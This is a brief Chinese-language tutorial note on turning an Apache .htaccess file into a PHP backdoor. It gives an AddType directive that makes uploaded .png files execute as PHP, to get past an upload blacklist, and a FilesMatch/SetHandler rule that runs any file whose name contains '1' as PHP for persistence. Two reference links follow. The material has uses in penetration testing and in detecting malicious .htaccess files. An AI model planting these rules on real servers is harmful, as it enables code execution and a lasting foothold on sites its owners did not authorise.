.htaccess文件构成的PHP后门

1、.htaccess文件

2、文件上传绕过

一般.htaccess可以用来留后门和针对黑名单绕过

创建一个txt写入（png解析为php）

AddType application/x-httpd-php .png

另存为.htaccess

上传.htaccess 必须是网站根路径

3、留后门

可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

123456.png  就会以php执行

参考文章：

https://www.cnblogs.com/hmbb/p/9689436.html4

https://www.cnblogs.com/feizianquan/p/11109390.html